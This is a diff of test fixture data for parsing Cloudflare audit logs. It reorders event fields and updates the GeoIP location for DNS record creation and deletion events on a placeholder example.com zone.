"{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"7e104142-b328-4e8f-94a1-ed0f1ffa87fb\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"95627e007af5aa70fe6c96fb6667a803\",\"name\":\"test.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065342\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:33.480205Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "7e104142-b328-4e8f-94a1-ed0f1ffa87fb", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2000,21 +2015,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776171421Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"7e104142-b328-4e8f-94a1-ed0f1ffa87fb\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"95627e007af5aa70fe6c96fb6667a803\",\"name\":\"test.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065342\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:33.480205Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "7e104142-b328-4e8f-94a1-ed0f1ffa87fb", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2042,14 +2042,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2061,6 +2061,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389088929Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1c2275b1-3d4d-46bf-8bb9-28c37f37976c\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"f25062e118b2ae5a7380b94b7144cca4\",\"name\":\"test2.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065354\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:27.804305Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "1c2275b1-3d4d-46bf-8bb9-28c37f37976c", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2088,21 +2103,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776174058Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1c2275b1-3d4d-46bf-8bb9-28c37f37976c\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"f25062e118b2ae5a7380b94b7144cca4\",\"name\":\"test2.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065354\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:27.804305Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "1c2275b1-3d4d-46bf-8bb9-28c37f37976c", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2130,14 +2130,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2149,6 +2149,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389089302Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ee6731f1-6c28-43b6-a711-ea035d622a83\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"18d1bbe795d5803f63ce12332c989074\",\"name\":\"another.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065351\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:23.918098Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "ee6731f1-6c28-43b6-a711-ea035d622a83", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2176,21 +2191,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776176659Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ee6731f1-6c28-43b6-a711-ea035d622a83\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"18d1bbe795d5803f63ce12332c989074\",\"name\":\"another.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065351\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:23.918098Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "ee6731f1-6c28-43b6-a711-ea035d622a83", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2218,14 +2218,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2237,6 +2237,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389089689Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9d043524-edf8-4693-8262-56578930d98a\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"f25062e118b2ae5a7380b94b7144cca4\",\"name\":\"asdf.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065354\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883896Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "9d043524-edf8-4693-8262-56578930d98a", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2263,21 +2278,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776179254Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9d043524-edf8-4693-8262-56578930d98a\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"f25062e118b2ae5a7380b94b7144cca4\",\"name\":\"asdf.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065354\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883896Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "9d043524-edf8-4693-8262-56578930d98a", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2305,14 +2305,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2324,6 +2324,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389090070Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"086acb98-9d2b-4c3b-9c6b-9cb00c04a995\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"18d1bbe795d5803f63ce12332c989074\",\"name\":\"tbh.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065351\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883815Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "086acb98-9d2b-4c3b-9c6b-9cb00c04a995", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2350,21 +2365,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776181840Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"086acb98-9d2b-4c3b-9c6b-9cb00c04a995\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"18d1bbe795d5803f63ce12332c989074\",\"name\":\"tbh.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065351\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883815Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "086acb98-9d2b-4c3b-9c6b-9cb00c04a995", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2392,14 +2392,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2411,6 +2411,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389090454Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"706053a5-7283-47da-b070-681a38d42e74\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"1a04a1819461ae1c88f910631c5bc3e3\",\"name\":\"stuff.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065348\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883723Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "706053a5-7283-47da-b070-681a38d42e74", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2437,21 +2452,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776184472Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"706053a5-7283-47da-b070-681a38d42e74\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"1a04a1819461ae1c88f910631c5bc3e3\",\"name\":\"stuff.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065348\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883723Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "706053a5-7283-47da-b070-681a38d42e74", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2479,14 +2479,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2498,6 +2498,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389090818Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1b3c5168-31ee-41ce-a8a3-0a99198ba8c9\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"connect.domains.google.com\",\"id\":\"a56b790a1293bdb5b4aeb88e23f1679a\",\"name\":\"_domainconnect.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"CNAME\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065345\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883628Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "1b3c5168-31ee-41ce-a8a3-0a99198ba8c9", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2524,21 +2539,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776187082Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1b3c5168-31ee-41ce-a8a3-0a99198ba8c9\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"connect.domains.google.com\",\"id\":\"a56b790a1293bdb5b4aeb88e23f1679a\",\"name\":\"_domainconnect.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"CNAME\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065345\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883628Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "1b3c5168-31ee-41ce-a8a3-0a99198ba8c9", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2566,14 +2566,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2585,6 +2585,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389091193Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"455dfac9-4a49-41dd-93d3-63a5aee919b1\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"95627e007af5aa70fe6c96fb6667a803\",\"name\":\"bob.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065342\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883551Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "455dfac9-4a49-41dd-93d3-63a5aee919b1", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2611,21 +2626,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776189671Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"455dfac9-4a49-41dd-93d3-63a5aee919b1\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"95627e007af5aa70fe6c96fb6667a803\",\"name\":\"bob.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065342\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883551Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "455dfac9-4a49-41dd-93d3-63a5aee919b1", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2653,14 +2653,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2672,6 +2672,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389091572Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ea28df9c-e0bd-4a3d-b56e-3861ee1d1a8a\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt4.gmr-smtp-in.l.google.com\",\"id\":\"e80fa3d2167cfcaf172201e46c79c004\",\"name\":\"example.com\",\"priority\":40,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065339\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883448Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "ea28df9c-e0bd-4a3d-b56e-3861ee1d1a8a", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2699,21 +2714,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776192282Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ea28df9c-e0bd-4a3d-b56e-3861ee1d1a8a\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt4.gmr-smtp-in.l.google.com\",\"id\":\"e80fa3d2167cfcaf172201e46c79c004\",\"name\":\"example.com\",\"priority\":40,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065339\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883448Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "ea28df9c-e0bd-4a3d-b56e-3861ee1d1a8a", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2741,14 +2741,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -2760,6 +2760,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389091945Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"5eea2e02-ae52-400c-855a-d48c92590133\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt3.gmr-smtp-in.l.google.com\",\"id\":\"5cf70e1b541a242428ece2af214889b2\",\"name\":\"example.com\",\"priority\":30,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065336\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883312Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "5eea2e02-ae52-400c-855a-d48c92590133", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -2787,21 +2802,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776194902Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"5eea2e02-ae52-400c-855a-d48c92590133\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt3.gmr-smtp-in.l.google.com\",\"id\":\"5cf70e1b541a242428ece2af214889b2\",\"name\":\"example.com\",\"priority\":30,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065336\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883312Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "5eea2e02-ae52-400c-855a-d48c92590133", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2829,14 +2829,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
